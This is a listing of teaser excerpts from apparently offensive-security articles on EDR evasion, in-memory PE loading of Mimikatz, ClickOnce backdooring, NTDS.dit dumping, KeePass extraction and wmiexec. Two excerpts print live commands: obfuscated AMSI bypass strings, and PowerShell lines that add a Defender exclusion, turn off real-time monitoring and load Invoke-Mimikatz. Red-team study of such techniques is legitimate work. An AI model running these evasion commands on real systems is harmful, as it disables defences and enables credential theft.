articles

IntroductionTo truly control a Windows system, you must operate at Ring 0, i.e., the kernel. The problem is that from user mode (Ring 3), you cannot interact directly with Ring 0, so it is impossible to modify the kernel’s internal structures, disable an EDR’s monitoring mechanisms, or manipulate process protections. Tools like WinDbg allow you to explore and modify kernel memory, but they are not viable in production environments: WinDbg requires a reboot to enable debug mode, a second machi...

IntroductionClickOnce is a Microsoft deployment technology built into the .NET Framework. It allows Windows applications to be distributed via a simple URL: the user clicks a link, and the application downloads, installs, and runs with very little user interaction. The idea is not to create a malicious application from scratch, but to backdoor an existing legitimate ClickOnce application and redeploy it. The application retains its normal behavior but executes arbitrary code upon launch. Sev...

IntroductionThe previous article on Local Hollowing addressed the issue of loading native PEs into memory. The encrypted payload is decrypted, manually mapped section by section, relocations are corrected, imports are resolved, and then the main thread is redirected to the entry point. This approach works because a native PE contains machine instructions that the CPU can understand directly. Therefore, it is sufficient to place the bytes in the correct location in memory and have the RIP poin...

IntroductionIn a previous article, we detailed how Local Hollowing works—a technique that allows a malicious PE file to be executed in memory without ever writing it in plaintext to the disk. The loader is compiled using OLLVM to obfuscate the machine code, and the payload (Mimikatz) is encrypted with AES-256 In theory, this combination should be sufficient to bypass static detection. In practice, Microsoft Defender detects the loader immediately: The MTB (Machine Learning Based Threat) suffi...

IntroductionDuring Red Team exercises, once initial access has been gained, one of the first obstacles is static detection. Deploying tools like Mimikatz to the disk is immediately detected by EDR because the signatures for these tools have long been known to EDR systems. Local Hollowing allows you to bypass this problem. The principle: a loader embeds the malicious PE (Portable Executable) encrypted with AES-256, decrypts it in memory at runtime, manually maps it to replace the Windows loade...

BypassAMSI BYPASS12Set-Item ('Va'+'rI'+'a'+'blE:1'+'q2'+'uZx') ([TYpE]("F"+'rE')) (Get-variable (('1Q'+'2U') +'zX'))."A`ss`Embly"."GET`TY`Pe"(('Uti'+'l','A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'...

IntroductionThe NTDS.dit file is the Active Directory database which contains : Data on all domain accounts Group membership relationships domain user password hashesThe retrieval of this file by an attacker is equivalent to the total compromise of the domain, as it means that the attacker has compromised the domain controller. In fact, this file is stored only on domain controllers and does not exist on other machines in the domain. How the NTDS dump works2.1 LocalizationThe default file p...

1. introductionKeeFarce Reborn is an offensil tool for extracting the contents of an unencrypted KeePass database when it is opened on the target machine.It is based on the work of several well-known projects: KeeFarce (extraction via DLL and CLrMD injection) KeeThief (master key recovery) KeePassHax (decryption via reflection) The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible. 2. How it worksThe tool takes t...

Préparation de l’environnementExécution en tant qu’administrateur1234Start-Process PowerShell_ISE -Verb RunAs Add-MpPreference -ExclusionPath "C:\Temp" Set-MpPreference -DisableRealtimeMonitoring $true Import-Module C:\Temp\Invoke-Mimikatz.ps1 Si windows defender ne peut pas être désactivé, faire un AMSI Bypass1S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`...

As part of internal penetration testing in Active Directory environments, it is often necessary to execute remote commands on Windows machines. Several tools are available for this purpose, but one of the most widely used is wmiexec. The general principle of wmiexecwmiexeclets you execute remote commands without copying files or creating services on the target machine. It is based onWMI (Windows Management Instrumentation)`, a native Windows technology for controlling a local or remote sy...